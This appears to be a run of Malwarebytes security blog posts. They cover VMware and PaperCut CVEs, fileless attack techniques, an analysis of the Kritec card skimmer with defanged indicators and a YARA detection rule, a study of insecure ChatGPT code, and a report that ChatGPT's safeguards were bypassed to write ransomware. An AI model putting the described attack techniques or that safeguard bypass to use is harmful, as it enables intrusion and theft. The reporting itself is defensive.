IT NEWS

Microsoft issued a client roadmap update on Thursday to remind us once again that Windows 10 support is slowly coming to an end. In less than three years, all Windows 10 users will need to have moved to Windows 11. While moving to Windows 11 should be a win for security, some Windows 10 fans may be a little nervous. Upgrading isn’t always straightforward, and exacting hardware requirements weigh heavily on Windows 11.

According to the update, the company intends the current version of Windows 10, version 22H2, to be the last edition of the operating system (OS). That meant no more new and significant features for Windows 10. Instead, interesting changes and enhancements will be incorporated into Windows 11. PCMag highlighted that this process is already underway.

Microsoft will continue to release monthly security updates for Windows 10 until October 14, 2025. After that, it will officially pull the plug for consumer users but not for organizations signed up to the Long Term Servicing Channel. Support for them will extend beyond the deadline for up to 10 years. From Microsoft’s description:

The Long-Term Servicing Channel (LTSC) is designed for Windows 10 devices and use cases where the key requirement is that functionality and features don’t change over time. Examples include medical systems (such as those used for MRI and CAT scans), industrial process controllers, and air traffic control devices. We designed the LTSC with these types of use cases in mind, offering the promise that we will support each LTSC release for 10 years–and that features, and functionality will not change over the course of that 10-year lifecycle.

Microsoft recommends Windows 10 users switch to Windows 11 if they haven’t already done so. Despite that, Windows 10 remains hugely popular, with a 69 percent share of Windows desktops, globally. Windows 11 trails significantly with just 18 percent, not far off Windows 7, which still accounts for nine percent.

Windows 11’s low numbers may soon change as the sunset date approaches, which would be good news for security. Microsoft’s latest OS makes multiple improvements over what’s available in Windows 10. Microsoft’s approach has been to create a chain of trust that ensures the integrity of the entire hardware and software stack, from the ground up. Many of the links in that chain rely on Virtualization Based Security (VBS), a technology that creates secure sandboxes isolated from the main OS. Doing that requires hardware-based virtualization features, which is why Windows 11 has such stringent hardware requirements.

Windows 11 also includes a more efficient way of warding off phishing attacks; warnings when users type passwords into notepad files and other programs; and a default account lockout policy to combat the dangers of Remote Desktop Protocol (RDP) brute force attacks, an automated attack wherein hackers try to guess a users’ passwords remotely, over RDP.

And, soon, Windows 11 will allow app developers to tap into its built-in human presence detection (HPD) capabilities to create and share unique experiences. HPD is a new feature that allows touch-free logins of laptops. It also automatically locks the device when a user walks away from it, giving them much-needed privacy. Of course, this feature can only be used if your laptop has the hardware to support it.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Four vulnerabilities in virtualisation software have been fixed by VMware, including two which were exploited at the 20223 Pwn2Own contest. Three have been given the severity rating “Important”, with the last (CVE-2023-20869) is classed as “Critical”.

Success! @starlabs_sg used an uninitialized variable and UAF against VMWare Workstation. They earn $80,000 and 8 Master of Pwn points, pushing the prize total for #P2OVancouver past $1,000,000. #Pwn2Own pic.twitter.com/DEjgYcmphH

— Zero Day Initiative (@thezdi) March 24, 2023

The four vulnerabilities are:

• CVE-2023-20869 is “Critical” flaw that affects Fusion and Workstation. It is a stack-based buffer overflow issue in the functionality for sharing host Bluetooth devices with the virtual machine. As per the advisory, “A malicious actor with local administrative privileges on a virtual machine may exploit this issue to execute code as the virtual machine’s VMX process running on the host.” Needless to say, guest VMs are not supposed to be able to make the host machines they’re running on do things.
• CVE-2023-20870 is an “Important” flaw that affects Fusion and Workstation. It’s another issue in the functionality for sharing host Bluetooth devices, but with this one an attacker can potentially read privileged information stored in the virtual machine’s hypervisor memory.
• CVE-2023-20871 is an “Important” flaw that only affects Fusion. It allows an attacker who has read / write access to the host operating system to elevate their privileges to gain root access to the host operating system.
• CVE-2023-20872 is an “Important” flaw that affects Fusion and Workstation. It allows virtual machines with a physical CD/DVD drive attached to execute code on the hypervisor, if the drive is configured to use a virtual SCSI controller.

Workarounds and updates

All four issues can be addressed by updating to the latest version of the affected software. At the time of writing these are VMware Fusion 13.0.2 and VMware Workstation 17.0.2. Workarounds are available for CVE-2023-20869, CVE-2023-20870, and CVE-2023-20872.

CVE-2023-20869 and CVE-2023-20870 can be mitigated by turning off Bluetooth support by unchecking the “Share Bluetooth devices with the virtual machine” option. The relevant support documents for each product are VMware Workstation Pro, VMware Workstation Player, and VMware Fusion.

CVE-2023-20872 can be mitigated by removing the CD/DVD device from the virtual machine. Alternatively, you can configure the virtual machine so that it does not use a virtual SCSI controller. After shutting down the virtual machine, the steps are:

To remove the CD/DVD device in VMWare Workstation:

• Select VM > Settings
• Click the Hardware tab
• Select the CD/DVD and click Remove

To remove the CD/DVD device in VMWare Fusion:

• Select a virtual machine in the Virtual Machine Library window
• Click on Virtual Machine menu
• Click Settings
• Under Removable Devices in the Settings window, select CD/DVD > Advanced Options > Remove CD/DVD Drive.

To configure VMWare Workstation not to use a virtual SCSI controller:

• Select VM > Settings
• Click the Hardware tab
• Select the CD/DVD > Advanced > CD/DVD Advanced Settings > Virtual device node
• You can configure the Bus type

To configure VMWare Fusion not to use a virtual SCSI controller:

• Select a virtual machine in the Virtual Machine Library window
• Click on Virtual Machine menu
• Click on Settings
• Under Removable Devices in the Settings window, Select CD/DVD > Advanced options > Bus type
• You can configure the Bus type.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

A few days ago we wrote about two vulnerabilities found in PaperCut application servers. As we noted, exploitation was fairly simple so there was some urgency to install the patches. My esteemed colleague Chris Boyd literally wrote:

“Arbitrary code can be deployed, or even ransomware if that’s part of the attacker’s toolkit.”

As it turns out, there are already two flavors of ransomware preying on those that haven’t updated yet.

A Cl0p affiliate, branded as DEV-0950 by Microsoft has already incorporated the PaperCut exploits into its attacks. This affiliate has also been known to use the GoAnywhere zero-day that basically brought Cl0p back from the dead last month.

In a surprising turn of events for the ransomware landscape, Cl0p emerged as the most used ransomware in March 2023, coming out of nowhere to dethrone the usual frontrunner, LockBit.

But don’t rule the habitual frontrunner LockBit out just yet. Microsoft Threat Intelligence said in a tweet that it’s “monitoring other attacks also exploiting these vulnerabilities, including intrusions leading to Lockbit deployment.”

How to avoid ransomware

• Block common forms of entry. Create a plan for patching vulnerabilities in internet-facing systems quickly; disable or harden remote access like RDP and VPNs; use endpoint security software that can detect exploits and malware used to deliver ransomware.
• Detect intrusions. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
• Stop malicious encryption. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
• Create offsite, offline backups. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
• Don’t get attacked twice. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

When you hear about malware, there’s a good chance you think of sketchy executables or files with extensions like .DOCX or .PDF that, once opened, execute malicious code. These are examples of file-based attacks—and while they can be bad, they’re nothing compared to their fileless cousins.

As the name suggests, fileless attacks don’t rely on traditional executable files to get the job done but rather in-memory execution, which helps them evade detection by conventional security solutions.

In this post, we’ll explore topics like how fileless attacks work, why they’re effective, and what you can do to find and block fileless threats.

Fileless attacks explained

In contrast to file-based attacks that execute the payload in the hard drive, fileless attacks execute the payload in Random Access Memory (RAM). Executing malicious code directly into memory instead of the hard drive has several benefits, such as:

• Evasion of traditional security measures: Fileless attacks bypass antivirus software and file signature detection, making them difficult to identify using conventional security tools.   
• Increased potential for damage: Since fileless attacks can operate more stealthily and with greater access to system resources, they may be able to cause more damage to a compromised system than file-based attacks.

• Memory-based attacks can be difficult to remediate: Since fileless attacks don’t create files, they can be more challenging to remove from a system once they have been detected. This can make it extra difficult for forensics to trace an attack back to the source and restore the system to a secure state.

Fileless attacks vs Living-off-the-land (LOTL) attacks

If you read our article on LOTL attacks, you may be confused: Aren’t fileless attacks and LOTL attacks the same thing? Well, yes and no.

LOTL attacks are anytime an attacker leverages legitimate tools to evade detection, steal data, and more, while fileless attacks refer purely to executing code directly into memory. While both types of attacks often overlap, they are not synonymous.

Think of fileless attacks as an occasional subset of LOTL attacks. Fileless attacks can and often do leverage LOTL techniques to execute payload into memory, but they can also do so without leveraging a legitimate system tool or process at all.

PowerShell script extracted from a Microsoft Word document. If macros are enabled, it would execute the code in memory upon being opened. Source.

For example, an attacker can use PowerShell to download and execute a malicious payload directly in memory, without writing it to the disk. In this case, the attack is both LOTL (since PowerShell is a legitimate tool) and fileless (as the payload is executed in memory).

On the other hand, an attacker injecting malicious JavaScript into a website can exploit browser vulnerabilities and execute payloads in memory. This fileless attack executes code without writing to the hard drive, but doesn’t qualify as LOTL as it doesn’t use a legitimate system tool or process.

5 different ways fileless attacks execute code in memory

Once an attacker gains access through phishing or exploiting vulnerabilities, they can execute malicious code in memory using several methods, some of which may overlap with LOTL techniques.

Below are five common techniques used in fileless attacks:

• PowerShell: A legitimate scripting that can execute malicious code directly in memory. As mentioned earlier, this technique overlaps with LOTL attacks as it leverages a built-in system tool.
• Process hollowing: Process hollowing is a fileless technique where attackers create a new process in a suspended state, replace its memory content with malicious code, and then resume the process. The malicious code executes in memory without writing to the disk.
• Reflective DLL injection: In this fileless attack, attackers load a malicious Dynamic Link Library (DLL) into a legitimate process’s memory without writing it to the disk. The DLL is executed directly in memory, evading detection by traditional security software.
• JavaScript and VBScript: Fileless attackers can use JavaScript or VBScript to run malicious code directly in memory within a web browser or other applications that support these scripting languages.
• Microsoft Office macros: Fileless attackers can use malicious macros embedded in Microsoft Office documents to execute code in memory when the document is opened. This method takes advantage of the legitimate macro functionality, making it an example of an LOTL technique as well.

Note that fileless attacks often rely on exploiting vulnerabilities in system components in each of these instances (such as Office or web-browsers) to execute their code. 

Preventing and spotting fileless attacks: Quick tips

Malwarebytes EDR and Exploit Protection: Safeguarding against fileless attacks

Malwarebytes Exploit Protection can effectively block many fileless attacks by monitoring and reinforcing application behavior, hardening applications, and ensuring advanced memory protection.

To configure Exploit Protection Advanced settings, follow these steps:

• Go to Configure > Policies in Nebula.

• Select a policy and navigate to Protection settings > Advanced settings > Anti-exploit settings.

Exploit Protection settings in a policy in Malwarebytes EDR.

Here’s an overview of the protection layers offered by Malwarebytes EDR Exploit Protection:

• Application Hardening: By enforcing security measures like DEP and ASLR, and disabling potentially vulnerable components like Internet Explorer VB Scripting, Application Hardening reduces the attack surface and makes it more difficult for fileless malware to exploit weaknesses in applications.
• Advanced Memory Protection: This layer prevents fileless malware from executing payload code in memory by detecting and blocking techniques such as DEP bypass, memory patch hijacking, and stack pivoting, thereby stopping the attack before it can cause harm.
• Application Behavior Protection: This layer also detects and blocks exploits that do not rely on memory corruption, such as Java sandbox escapes or application design abuse exploits. Options include Malicious LoadLibrary Protection, Protection for Internet Explorer VB Scripting, Protection for MessageBox Payload, and protection against various Microsoft Office macro exploits. 
• Java Protection: These settings protect against exploits commonly used in Java programs. By guarding against Java-specific exploits, such as web-based Java command execution and Java Meterpreter payloads, Java Protection can effectively prevent fileless attacks that leverage Java vulnerabilities to infiltrate systems and execute malicious code.

Fighting fileless threats with Malwarebytes EDR: Configuring Suspicious Activity Monitoring in Nebula

Malwarebytes Endpoint Detection and Response (EDR) offers an effective solution to detect and mitigate fileless malware threats by monitoring potentially malicious behavior on endpoints. The Suspicious Activity Monitoring feature in Nebula uses machine learning models and cloud-based analysis to detect questionable activities. In this section, we will outline how to configure Suspicious Activity Monitoring in Nebula.

To enable Suspicious Activity Monitoring in your policy:

• Log in to your Nebula console.
• Navigate to Configure > Policies.
• Click “New” or select an existing policy.
• Choose the “Endpoint Detection and Response” tab.
• Locate “Suspicious Activity Monitoring” and enable it for the desired operating systems.

Suspicious Activity monitoring detections in Nebula showing a possible fileless attack. On the right, we see the command line context for this process in our organization.

Advanced Settings offer additional options for activity monitoring. To configure these settings:

• In the same “Endpoint Detection and Response” tab, find the “Advanced Settings” section.
• Enable “Server operating system monitoring for suspicious activity” to extend monitoring to server operating systems. 
• Enable “Very aggressive detection mode” to apply a tighter threshold for flagging processes as suspicious. 
• Toggle “Collect networking events to include in searching” to ON (default) or OFF, depending on your preference. Turning it OFF decreases traffic sent to the cloud.

Flight Recorder Search

Flight Recorder Search collects all endpoint events within its search functionality. By configuring Suspicious Activity Monitoring in Malwarebytes EDR through the Nebula platform, you can effectively counter fileless malware threats by monitoring processes, registry, file system, and network activity on the endpoint. 

Respond to fileless attacks quickly and effectively

Managed Detection and Response (MDR) services provide an attractive option for organizations without the expertise to manage EDR solutions. MDR services offer access to experienced security analysts who can monitor and respond to threats 24/7, detect and respond to fileless attacks quickly and effectively, and provide ongoing tuning and optimization of EDR solutions to ensure maximum protection. 

Stop fileless attacks today

To ensnare new victims, criminals will often devise schemes that attempt to look as realistic as possible. Having said that, it is not every day that we see the fraudulent copy exceed the original piece.

While following up on an ongoing Magecart credit card skimmer campaign, we were almost fooled by a payment form that looked so well done we thought it was real. The threat actor used original logos from the compromised store and customized a web element known as a modal to perfectly hijack the checkout page.

While the technique to insert frames or layers is not new, the remarkable thing here is that the skimmer looks more authentic than the original payment page. We were able to observe several more compromised sites with the same pattern of using a custom-made and fraudulent modal.

This skimmer and associated campaigns represent one of the most active Magecart attacks we have been tracking in recent months.

Smooth checkout 

We identified a compromised online website for a Parisian travel accessory store running on the PrestaShop CMS. A skimmer we previously identified as Kritec, was injected and loading malicious JavaScript that altered the checkout process. In the following section, we will compare the checkout process when the skimmer is active and when it is not.

Fraudulent payment form

What we see here is the use of a ‘modal‘ which is a web page element displayed in front of the current active page. The modal disables and grays out the background so that the user can focus on the presented element instead. This is an elegant way for website owners to keep their customers on the same web site and have them interact with another form.

Figure 1: Compromised store loads fake payment modal

The problem is that this modal is entirely fake and designed to steal credit card data. It may sound hard to believe given everything matches to the original brand and feel of the site. Before digging further into why it is fraudulent, we will take a look at the same online store when the skimmer has been disabled.

Actual (real) payment form

In order to view this legitimate sequence, we first had to block the skimmer when requesting the e-commerce page. In our case, we simply blocked the connection to the malicious domain where the skimmer is hosted. As a result, the website will display what the original payment form should be (prior to the compromise).

Figure 2: Legitimate payment form when same store is not compromised

The actual payment flow for this merchant is to redirect users to a third-party processor hosted by Dalenys, now part of Payplug, a French payment solutions company. So rather than display a modal, it loads the webpage for the payment processor to allow the user to enter their banking information. Once that is validated, it will take them back to the merchant page.

Malicious modal

The malicious modal is built very cleanly and contains an animation that displays the store’s logo in the middle and then moves it back up. We have to give credit where credit is due: this is a very well done skimmer that is actually a smoother user experience than the store’s default. We should also note that the malware author is not only well versed in web design, they also use proper language (French) for each form field.

Figure 3: A closer look at the fake modal

However, we noticed a small mistake in the hyperlink for Politique de confidentialité (terms of use). That link redirects to the terms of use for Mercardo Pago, a payment processor used in South America. It is likely the threat actor copied the data from a previous template and did not notice their mistake. This is just a detail, and does not affect the functionality of the skimmer at all.

We can try to look for this erroneous hyperlink within the skimmer source code in order to confirm that the modal was created by the threat actor. The skimmer is rather complex and heavily obfuscated but we can see that HTML content is generated dynamically and goes through a decodeURIComponent routine.

Figure 4: Extracting code from the skimmer to reveal connection with the modal

If we step through the code until the modal is loaded, we can grabbing the Base64 value corresponding to the HTML content. One we have it, we can convert it to plain text and finally see the reference to mercadopago, that is proof that the skimmer is the one rendering this beautiful modal. In fact, we can see the whole thing is an iframe called v.ECPay:

Figure 5: The iframe created by the skimmer to display the modal

Full payment flow

We recreated the payment flow from the perspective of a customer shopping via that compromised store. We can see that upon selecting the credit card payment option, the malicious modal is loaded and will harvest their payment card details.

A fake error is then displayed briefly “votre paiment a été annulé” (your payment was cancelled) before the user is redirected to the real payment URL:

Figure 6: Payment process flow with the skimmer active

On the second attempt, the payment will go through and victims will be unaware of what just happened.

The skimmer will drop a cookie which will serve as an indication that the current session is now marked as completed. If the user was to go back and attempt the payment again, the malicious modal would no longer be displayed (instead the real payment method by the external processor Dalenys will be used).

Figure 7: Cookie dropped by skimmer once data has been stolen

Ongoing, covert campaigns

We now believe this Kritec skimmer is part of the same compromises with injections into vulnerable websites where malicious code is placed within the Google Tag Manager script. It is possible multiple threat actors are involved in those campaigns and customizing skimmers accordingly.

While many hacked stores had a generic skimmer, it appears the custom modals were developed fairly recently, maybe a month or two ago. The threat actor is using different domains to host the skimmer but names them in a similar way: [name of store]-loader.js.

We crawled several thousand e-commerce sites and found more fraudulent modals, in different languages.

Figure 8: A Dutch e-commerce site with the fake modal

Figure 9: A Finnish e-commerce site with the fake modal

Discerning whether an online store is trustworthy has become very difficult and this case is a good example of a skimmer that would not raise any suspicion.

If you are a Malwarebytes customer, you will get a notification and block when attempting to make a purchase from a store that has been compromised by this skimmer.

Figure 10: Skimmer being blocked by Malwarebytes

Indicators of Compromise

Domain names

genlytec[.]us
shumtech[.]shop
zapolmob[.]sbs
daichetmob[.]sbs
interytec[.]shop
pyatiticdigt[.]shop
stacstocuh[.]quest

IP addresses

195.242.110[.]172
195.242.110[.]83
195.242.111[.]146
45.88.3[.]201
45.88.3[.]63

YARA rule

rule kritecloader
{
 strings:
     $string = "'fetchModul'"
     $string2 = "'setAttribu'"
     $string3 = "'contentWin'"
     $string4 = "'zIndex'"

condition:
    all of them
}

Research by computer scientists associated with the Université du Québec in Canada has found that ChatGPT, OpenAI’s popular chatbot, is prone to generating insecure code.

“How Secure is Code Generated by ChatGPT?” is the work of Raphaël Khoury, Anderson Avila, Jacob Brunelle, and Baba Mamadou Camara. The paper concludes that ChatGPT generates code that isn’t robust, despite claiming awareness of its vulnerabilities. 

“The results were worrisome,” the researchers say in the paper. “We found that, in several cases, the code generated by ChatGPT fell well below minimal security standards applicable in most contexts.”

“In fact, when prodded to whether or not the produced code was secure, ChatGPT was able to recognize that it was not. The chatbot, however, was able to provide a more secure version of the code in many cases if explicitly asked to do so.”

In the experiment, the researchers assumed the role of a novice programmer who doesn’t have security in mind. They asked ChatGPT to generate code, specifying in some cases that the code would be used in a “security-sensitive context.” What they didn’t do, however, was specifically ask the AI chatbot to create secure code or include certain security features.

ChatGPT generated 21 applications written in five programming languages: C, C++, HTML, Java, and Python. The programs are simple, with 97 lines of code at most.

In its first run, ChatGPT produced five secure applications out of 21. When prompted for changes, it made seven more secure applications from the remaining 16.

The authors note that ChatGPT can only create “secure” code when a user requests it. When tasked with creating a simple FTP server for file sharing, it generated code without applying input sanitization (where code is checked for harmful characters and removed where necessary). ChatGPT only added the security feature after the authors prompted it to do so.

“Part of the problem seems to be that ChatGPT simply doesn’t assume an adversarial model of execution,” the authors say, explaining why the AI bot cannot create secure code by default. Despite this, the bot readily admits to errors in its code.

“If asked specifically on this topic, the chatbot will provide the user with a cogent explanation of why the code is potentially exploitable. However, any explanatory benefit would only be available to a user who ‘asks the right questions’. i.e.; a security-conscious programmer who queries ChatGPT about security issues.”

Additionally, the authors point to the chatbot’s ethical inconsistency when it refuses to create attack code but will create insecure code.

It might refuse to create attack code, but there are ways round it. Malwarebytes Security Evangelist Mark Stockley decided to try to create ransomware using ChatGPT. The AI bot refused to create malware code at first, but Stockley found his way around the initial safeguards and managed to get it to create (admittedly quite dubious) ransomware anyway.

In an interview with The Register, one of the Université du Québec researchers said he had concerns about ChatGPT. “We have actually already seen students use this, and programmers will use this in the wild,” Khoury said. “So having a tool that generates insecure code is really dangerous. We need to make students aware that if code is generated with this type of tool, it very well might be insecure.”

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Researchers at Infoblox have discovered a new toolkit being used in the wild called Decoy Dog. It targets enterprises, and has a fondness for deploying a remote access trojan called Pupy RAT.

Activity from the RAT was first noticed earlier this month. Subsequent research revealed that it has been in operation since at least April last year. An initial two domains were being used as Command & Control centers (C2), with almost all of the C2 communications originating from Russia.

From there, further research identified a DNS signature not related to Pupy components. This signature was so unique that its presence indicated not just the open source Pupy RAT, but the Decoy Dog toolkit being used for deployment. Infoblox claims that this unique DNS signature for Decoy Dog “matches less than 0.0000027% of the 370 million active domains on the internet”.

Pupy itself has been seen in numerous nation state attacks and other serious compromises. Back in 2020, it was at the heart of a European electricity association breach. Elsewhere, it was seen as part of a campaign called Magic Hound in 2017, which targeted Government and technology sectors in Saudi Arabia.

Pupy RAT is very good at hiding in networks for long periods of time and can infect several platforms including Windows, Linux, and mobile. It communicates with its C2 via DNS. This makes it harder to spot than more common forms of malicious activity due to its tiny footprint. Its open source nature means all manner of changes—such as detecting sandboxes, installing keyloggers, or dumping hashes from a target system—can be made to keep security teams on their toes.

It’s not easy to set up or make use of, as a result of the skill required to use the tool alongside effective DNS server configurations. This is not your average DIY bedroom coded malware operation, and anyone using this knows what they’re doing.

There is currently no evidence to suggest any consumer targets have been hit by the Decoy Dog/Pupy RAT combination. So far, everything Infoblox and other security vendors it’s consulted with has all been enterprise based. This makes sense; it would be rather peculiar to see something of this nature striking out at people in their homes. If you’re not an enterprise or running “large organisational, non-consumer devices” then this isn’t something you’re likely to run into.

Additionally, there’s no data shared on which sector is targeted by the above, so it’s currently impossible to say if it’s one specific realm of business at risk here or if the group behind these installations is picking targets at random. One would suspect the former. While the energy sector shows up in many historical Pupy attacks, that doesn’t mean this is the case here. Investigations into Decoy Dog and Pupy RAT are ongoing, so for now we have to hope that this particular spate of network compromise is still something of a rarity.

Users of Malwarebytes are protected against this threat.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

In a security notification, APC has warned home and corporate users about critical vulnerabilities in the software used to monitor and control their UPS systems online.

APC, which started as the American Power Conversion in 1981, today is a part of Schneider Electric™.  APC is an industry leader in physical infrastructure and software solutions, and one of the most popular uninterruptible power supply (UPS) brands. The company offers a range of UPS solutions, from home users to industrial control applications.

The monitoring software affected by the vulnerabilities is:

• APC Easy UPS Online Monitoring Software (V2.5-GA-01-22320 and prior (Windows 10, 11 Windows Server 2016, 2019, 2022))
• Schneider Electric Easy UPS Online Monitoring Software (V2.5-GS-01-22320 and prior (Windows 10, 11 Windows Server 2016, 2019, 2022))

The Easy UPS Online Monitoring Software is used to configure and manage APC and Schneider Electric branded Easy UPS products.

Users of APC Easy UPS Online Monitoring Software (Windows 10) can download a versions that includes a fix here.

Users of Schneider Electric Easy UPS Online Monitoring Software (Windows 10) can get a version that includes a fix here.

Failure to apply the remediations may risk remote code execution, escalation of privileges, or authentication bypass, which could result in execution of malicious web code or loss of device functionality.

Any users that choose not to apply the remediation provided above, should immediately apply the following general security recommendations to reduce the risk of exploit:

For Windows (10, 11) and Windows server 2016, 2019, 2022: Customers with direct access to their Easy UPS units should upgrade to PowerChute Serial Shutdown (PCSS) software on all servers protected by the Easy UPS On-Line (SRV, SRVL models).

As a general advice, it’s worth saying that online monitoring tools should be behind a firewall, and access should be restricted to those that really need it.

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The CVEs patched in these updates are:

CVE-2023-29411 CVSS score 9.8 out of 10: A missing authentication for critical function vulnerability exists that could allow changes to administrative credentials, leading to potential remote code execution without requiring prior authentication on the Java RMI interface. Exploiting this vulnerability offers an unauthorized attacker the option to change the administrator login credentials.

CVE-2023-29412 CVSS score 9.8 out of 10: The improper handling of case sensitivity vulnerability exists that could cause remote code execution when manipulating internal methods through Java RMI interface. The software does not neutralize or incorrectly neutralizes special elements which could lead to remote code execution.

CVE-2023-29413 CVSS score 7.5 out of 10: A missing authentication for critical function vulnerability exists that could cause Denial-of-Service when accessed by an unauthenticated user on the Schneider UPS Monitor service. Generally Denial-of-Service vulnerabilities are not considered serious, but given the importance in some use cases of uninterrupted power supply, the consequences of an outage can be serious.

We don’t just report on vulnerabilities—we identify them, and prioritize action.

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using Malwarebytes Vulnerability and Patch Management.

PaperCut, maker of print management solutions, has urged product users to update as soon as possible. A security vulnerability which exploits unpatched servers has been seen in the wild, with serious ramifications for any organisation impacted.

Two specific vulnerabilities are at the heart of this alert, and are ranked with severity scores of 9.8 (critical) and 8.2 (high) respectively. Full information about the individual security flaws has not been revealed, in order to reduce the likelihood of more attackers making use of them.

Mitigation

At time of writing, both security issues have been addressed with patches. If you update your PaperCut application servers, you are no longer at risk. A recent check in security tool Shodan’s search functionality highlights roughly 1,700 software instances currently exposed to the internet. These flaws are quite severe, so it’s absolutely worth your time to get things updated as soon as possible.

From the Updating FAQ:

• Please follow your usual upgrade procedure. Additional links on the ‘Check for updates’ page (accessed through the Admin interface > About > Version info > Check for updates) will allow customers to download fixes for previous major versions which are still supported (e.g. 20.1.7 and 21.2.11) as well as the current version available.
• If you are using PaperCut MF, we highly recommend following your regular upgrade process. Your PaperCut partner or reseller information can also be found on the ‘About’ tab in the PaperCut admin interface.

If you’re unable to upgrade

PaperCut advises those who are unable to apply the patches to follow the below steps:

• Block all inbound traffic from external IPs to the web management port (port 9191 and 9192 by default)
• Block all traffic inbound to the web management portal on the firewall to the server. Note: this will prevent lateral movement from internal hosts but management of the PaperCut service can only be performed on that asset.
• Apply “Allow list” restrictions under Options > Advanced > Security > Allowed site server IP addresses. Set this to only allow the IP addresses of verified Site Servers on your network. Note this only addresses ZDI-CAN-19226 / PO-1219.

Exploits

The two exploits in question are:

CVE-2023-27350: This vulnerability allows remote attackers to bypass authentication on affected installations of PaperCut NG 22.0.5 (Build 63914). Authentication is not required to exploit this vulnerability.

CVE-2023-27351: This vulnerability allows remote attackers to bypass authentication on affected installations of PaperCut NG 22.0.5 (Build 63914). Authentication is not required to exploit this vulnerability. The issue results from improper implementation of the authentication algorithm. An attacker can leverage this vulnerability to bypass authentication on the system.

In both cases, compromised systems could be used to perform additional exploitation after the initial attack. Arbitrary code can be deployed, or even ransomware if that’s part of the attacker’s toolkit. The relative ease with which these exploits can be launched is just one reason for the high threat severity score. Indeed, researchers quickly discovered two types of (legitimate) remote management software being used in these attacks. These management tools are used to grant a potential form of persistent remote access to the target network. From here, they can burrow in ever deeper without the affected organisation noticing.

It will probably be a while before all possible patchable installations are running the necessary updates. If you’re potentially affected, do your part and head over to the updates page immediately.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

The Canadian Yellow Pages Group has confirmed it recently became victim of a cyberattack. The Black Basta ransomware group has claimed responsibility for this attack by posting about Yellow Pages on the “Basta News” leak site.

When such a post shows up, it usually means that negotiations with the victim have stopped and that the ransomware group is getting ready to sell the data it managed to get its hands on during the attack.

Based on the most recent leaked information and an outage of the Yellow Pages website Canada 411 at the beginning of April, it is likely the attack occurred between March 15 and April 7. Attackers using Black Basta have been known to be active on a victim’s network for two to three days before running their ransomware.

Canada is ranked first if you look at the number of ransomware attacks divided by GDP.

Number of ransomware attacks per $1T GDP

Black Basta is not very different from other ransomware groups in the way it operates. Similar to others, the gang’s attacks frequently begin with initial access gained through phishing attacks. A typical attack might start with an email containing a malicious document in a zip file. Upon extraction, the document installs the Qakbot banking trojan to create backdoor access and deploy SystemBC, which sets up an encrypted connection to a command and control server. From there, CobaltStrike is installed for network reconnaissance and to distribute additional tools.

As is the overarching trend for ransomware groups these days, Black Basta’s primary goal is to steal data so that it can hold the threat of leaked data over its victims. The data is generally stolen using the command line program Rclone, which filters and copies specific files to a cloud service. After the data is copied, the ransomware encrypts files with the “.basta” extension, erases volume shadow copies, and presents a ransom note named readme.txt on affected devices. Attackers using Black Basta may be active on a victim’s network for two to three days before running their ransomware.

On the leak site, Black Basta provided samples of highly sensitive information about several people. Included are copies of Canadian passports, Quebec and British Columbia driver’s licenses, Régie de l’assurance- maladie du Québec (RAMQ health insurance) cards, and a tax return containing one individual’s social insurance number.

Franco Sciannamblo, YP’s Senior Vice President Chief Financial Officer commented in a statement to BleepingComputer:

“Based on our investigation to date, we have reason to believe that the unauthorized third party stole certain personal information from servers containing YP employee data and limited data relating to our business customers.”

All impacted individuals and the appropriate privacy regulatory authorities have been notified about the attack.

How to avoid ransomware

• Block common forms of entry. Create a plan for patching vulnerabilities in internet-facing systems quickly; disable or harden remote access like RDP and VPNs; use endpoint security software that can detect exploits and malware used to deliver ransomware.
• Detect intrusions. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
• Stop malicious encryption. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
• Create offsite, offline backups. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
• Don’t get attacked twice. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW